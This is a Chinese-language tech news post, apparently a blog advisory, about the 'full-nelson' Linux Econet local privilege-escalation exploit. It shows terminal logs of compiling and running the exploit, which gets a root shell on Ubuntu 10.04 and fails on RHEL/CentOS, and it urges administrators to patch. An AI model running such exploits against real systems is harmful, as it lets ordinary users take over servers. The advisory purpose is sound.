Linux再爆root帳號提權漏洞
系統(tǒng)安全高手 Dan Rosenberg 發(fā)布了一段 C 程序, 這段200多行的程序利用了 Linux Econet 協(xié)議的3個安全漏洞,可以導致本地帳號對系統(tǒng)進行拒絕服務或特權提升,也就是說一個普通用戶可以通過運行這段程序后輕松獲得 root shell,以下在 update 過的 Ubuntu 10.04 Server LTS 上測試通過:
- $ sudo apt-get update
- $ sudo apt-get upgrade
- $ uname -r
- 2.6.32-21-server
- $ gcc full-nelson.c -o full-nelson
- $ ./full-nelson
- [*] Resolving kernel addresses...
- [+] Resolved econet_ioctl to 0xffffffffa0131510
- [+] Resolved econet_ops to 0xffffffffa0131600
- [+] Resolved commit_creds to 0xffffffff8108b820
- [+] Resolved prepare_kernel_cred to 0xffffffff8108bc00
- [*] Calculating target...
- [*] Failed to set Econet address.
- [*] Triggering payload...
- [*] Got root!
- #
由于 RHEL/CentOS 默認不支持 Econet 協(xié)議,所以測試沒有通過:
- # yum update
- $ uname -r
- 2.6.18-194.26.1.el5
- $ gcc full-nelson.c -o full-nelson
- $ ./full-nelson
- [*] Failed to open file descriptors.
如果在企業(yè)環(huán)境用 Ubuntu 的話可能會比較杯具了,幾百個帳號里總可以找到一兩個帳號被內部或外部人員通過上面這段程序拿到 root,這對服務器的危害是毀滅性的。前天還在說 Ubuntu 在內核方面無作為, 現(xiàn)在想起來還有點后怕。VPSee 提醒正在使用多個普通帳號登錄 Ubuntu VPS 的朋友及時升級或打內核補丁,出售 VPN/SSH 帳號、提供免費 SSH 的商家尤其要小心 “客戶” 搗亂,使用其他 Linux 發(fā)行版的朋友也最好檢查一下自己的 VPS 有沒有這些高危漏洞。
【編輯推薦】